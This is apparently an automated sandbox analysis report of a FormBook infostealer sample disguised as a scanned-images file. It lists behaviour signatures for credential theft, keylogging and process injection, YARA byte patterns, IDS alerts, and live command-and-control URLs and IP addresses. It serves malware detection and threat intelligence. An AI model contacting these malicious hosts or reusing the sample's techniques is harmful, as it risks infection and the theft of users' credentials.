Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe

Overview

General Information

Sample name:Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe
Analysis ID:1494558
MD5:58077f7b69ca6e33ec9a13f1b2b53c02
SHA1:09c02cdd3a29100c0398c4a2192bfbfef34fb94c
SHA256:758ad60c19d53019939eeb1ac2502931f5f6c17ae9184372f8f30efac42f90c1
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates processes with suspicious names
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe (PID: 6568 cmdline: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe" MD5: 58077F7B69CA6E33EC9A13F1B2B53C02)
    • svchost.exe (PID: 5740 cmdline: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XraVxjqYYo.exe (PID: 4756 cmdline: "C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • schtasks.exe (PID: 1944 cmdline: "C:\Windows\SysWOW64\schtasks.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
          • XraVxjqYYo.exe (PID: 1808 cmdline: "C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3152 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2a790:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13dff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 11 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.2120000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.2120000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2ddf3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.2120000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.2120000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2cff3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16662:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", CommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", ParentImage: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, ParentProcessId: 6568, ParentProcessName: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", ProcessId: 5740, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", CommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", ParentImage: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, ParentProcessId: 6568, ParentProcessName: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, ProcessCommandLine: "C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe", ProcessId: 5740, ProcessName: svchost.exe

            Suricata Signatures

            Timestamp:2024-08-18T18:27:31.736327+0200
            SID:2855464
            Severity:1
            Source Port:54153
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:03.084512+0200
            SID:2855464
            Severity:1
            Source Port:54113
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:27:54.136691+0200
            SID:2855465
            Severity:1
            Source Port:54154
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:39.070556+0200
            SID:2855464
            Severity:1
            Source Port:54140
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:27:11.524512+0200
            SID:2855465
            Severity:1
            Source Port:54150
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:36.534944+0200
            SID:2855464
            Severity:1
            Source Port:54139
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:22.591621+0200
            SID:2855464
            Severity:1
            Source Port:54135
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:05.596887+0200
            SID:2855465
            Severity:1
            Source Port:54114
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:27:09.314071+0200
            SID:2855464
            Severity:1
            Source Port:54149
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:55.739873+0200
            SID:2855464
            Severity:1
            Source Port:54145
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:41.578715+0200
            SID:2855464
            Severity:1
            Source Port:54124
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:11.701068+0200
            SID:2855464
            Severity:1
            Source Port:54132
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:30.196897+0200
            SID:2855465
            Severity:1
            Source Port:54138
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:14.261587+0200
            SID:2855464
            Severity:1
            Source Port:54133
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:16.688199+0200
            SID:2855464
            Severity:1
            Source Port:54117
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:27:03.862811+0200
            SID:2855464
            Severity:1
            Source Port:54147
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:09.344103+0200
            SID:2855464
            Severity:1
            Source Port:54131
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:27:06.426141+0200
            SID:2855464
            Severity:1
            Source Port:54148
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:27:29.189423+0200
            SID:2855464
            Severity:1
            Source Port:54152
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:28:01.299489+0200
            SID:2855464
            Severity:1
            Source Port:54155
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:33.234377+0200
            SID:2855465
            Severity:1
            Source Port:54122
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:24:41.453793+0200
            SID:2855465
            Severity:1
            Source Port:54110
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:11.551685+0200
            SID:2855464
            Severity:1
            Source Port:54115
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:27:26.642647+0200
            SID:2855464
            Severity:1
            Source Port:54151
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:24:57.999560+0200
            SID:2855464
            Severity:1
            Source Port:54111
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:44.122206+0200
            SID:2855464
            Severity:1
            Source Port:54125
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:58.248296+0200
            SID:2855465
            Severity:1
            Source Port:54146
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:46.635923+0200
            SID:2855465
            Severity:1
            Source Port:54126
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:52.178527+0200
            SID:2855464
            Severity:1
            Source Port:54127
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:54.683042+0200
            SID:2855464
            Severity:1
            Source Port:54128
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:19.127535+0200
            SID:2855465
            Severity:1
            Source Port:54118
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:24.703851+0200
            SID:2855464
            Severity:1
            Source Port:54119
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:25.374501+0200
            SID:2855464
            Severity:1
            Source Port:54136
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:44.312610+0200
            SID:2855465
            Severity:1
            Source Port:54142
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:00.535819+0200
            SID:2855464
            Severity:1
            Source Port:54112
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:57.429856+0200
            SID:2855464
            Severity:1
            Source Port:54129
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:28:03.830528+0200
            SID:2855464
            Severity:1
            Source Port:54156
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:28:07.986584+0200
            SID:2855464
            Severity:1
            Source Port:54157
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:53.197381+0200
            SID:2855464
            Severity:1
            Source Port:54144
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:41.642626+0200
            SID:2855464
            Severity:1
            Source Port:54141
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:50.635506+0200
            SID:2855464
            Severity:1
            Source Port:54143
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:23:51.800190+0200
            SID:2855465
            Severity:1
            Source Port:54158
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:27.651468+0200
            SID:2855464
            Severity:1
            Source Port:54137
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:27.276518+0200
            SID:2855464
            Severity:1
            Source Port:54120
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:16.778289+0200
            SID:2855465
            Severity:1
            Source Port:54134
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:39.036607+0200
            SID:2855464
            Severity:1
            Source Port:54123
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:14.036185+0200
            SID:2855464
            Severity:1
            Source Port:54116
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:25:29.822772+0200
            SID:2855464
            Severity:1
            Source Port:54121
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:2024-08-18T18:26:03.454517+0200
            SID:2855465
            Severity:1
            Source Port:54130
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://www.a9jcpf.top/mpex/?dZo=Zb/vXsPYNAfjWKU6DONX2DmivYpazk1zNhfSVr6onri574wTGgCf5cxGoeAVsjx/n1bbhUl7cIXTAf7wH/T3VTZ4C1VoYJ2+BjO5oufoKkfdfMAaow==&gta=rzqXf4A02FEl_8Avira URL Cloud: Label: malware
            Source: http://www.rtrpodcast.online/l2ei/Avira URL Cloud: Label: malware
            Source: http://www.a9jcpf.top/mpex/Avira URL Cloud: Label: malware
            Source: http://www.tqfabxah.com/zjwj/?dZo=nHLCZn8vN2ArVDTu2n5oID6vRNbj9hrWV4l8hQoFqQuK0GTLFPexr5xj3EirNaSr0bv3za4OohaILLkKIoyZXyXWPQEhmyBEuX+CqEarOAabuvO7hw==&gta=rzqXf4A02FEl_8Avira URL Cloud: Label: malware
            Source: http://www.tqfabxah.com/zjwj/Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeReversingLabs: Detection: 76%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.2120000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.2120000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.1624858968.0000000002120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3809994652.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1625612818.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3811962670.0000000005410000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3809765058.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1625179434.0000000002B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3798026711.00000000026B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3809886003.0000000002A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeJoe Sandbox ML: detected
            Source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: schtasks.pdb source: svchost.exe, 00000002.00000003.1592887920.0000000002649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592887920.000000000261A000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XraVxjqYYo.exe, 00000008.00000000.1545991574.000000000046E000.00000002.00000001.01000000.00000005.sdmp, XraVxjqYYo.exe, 0000000A.00000002.3798030876.000000000046E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1334363237.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1530797185.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532825670.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.000000000301E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1627214817.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1625049218.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1333185722.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exe, 00000000.00000003.1334363237.0000000004120000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1625220837.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1530797185.0000000002900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1625220837.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532825670.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, schtasks.exe, 00000009.00000002.3810622511.000000000301E000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1627214817.0000000002CCC000.00000004.00000020.00020000.00000000.sdmp, schtasks.exe, 00000009.00000002.3810622511.0000000002E80000.00000040.00001000.00020000.00000000.sdmp, schtasks.exe, 00000009.00000003.1625049218.0000000002B16000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: schtasks.exe, 00000009.00000002.3811492832.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696350380.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1913594135.0000000023C5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: schtasks.pdbGCTL source: svchost.exe, 00000002.00000003.1592887920.0000000002649000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1592887920.000000000261A000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000AC8000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 00000008.00000002.3806174730.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: schtasks.exe, 00000009.00000002.3811492832.00000000034AC000.00000004.10000000.00040000.00000000.sdmp, schtasks.exe, 00000009.00000002.3801096520.00000000028E4000.00000004.00000020.00020000.00000000.sdmp, XraVxjqYYo.exe, 0000000A.00000000.1696350380.0000000002FDC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.1913594135.0000000023C5C000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A84696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00A84696
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00A8C9C7
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8C93C FindFirstFileW,FindClose,0_2_00A8C93C
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A8F200
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00A8F35D
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A8F65E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A83A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A83A2B
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A83D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00A83D4E
            Source: C:\Users\user\Desktop\Scanned-IMGS_from Bumi Wangsa TMS Sdn Bhd..exeCode function: 0_2_00A8BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00A8BF27
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 9_2_026CBAB0 FindFirstFileW,FindNextFileW,FindClose,9_2_026CBAB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then xor esi, esi2_2_021382BA
            Source: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exeCode function: 4x nop then xor esi, esi8_2_03231627
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then xor eax, eax9_2_026B9720
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then xor esi, esi9_2_026C4C57
            Source: C:\Windows\SysWOW64\schtasks.exeCode function: 4x nop then mov ebx, 00000004h9_2_02CB0548

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.9:54134 -> 64.226.69.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54152 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54115 -> 217.116.0.191:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54155 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54151 -> 116.213.43.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54145 -> 35.241.42.217:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54112 -> 38.12.1.29:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54132 -> 64.226.69.42:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54127 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.9:54116 -> 217.116.0.191:80
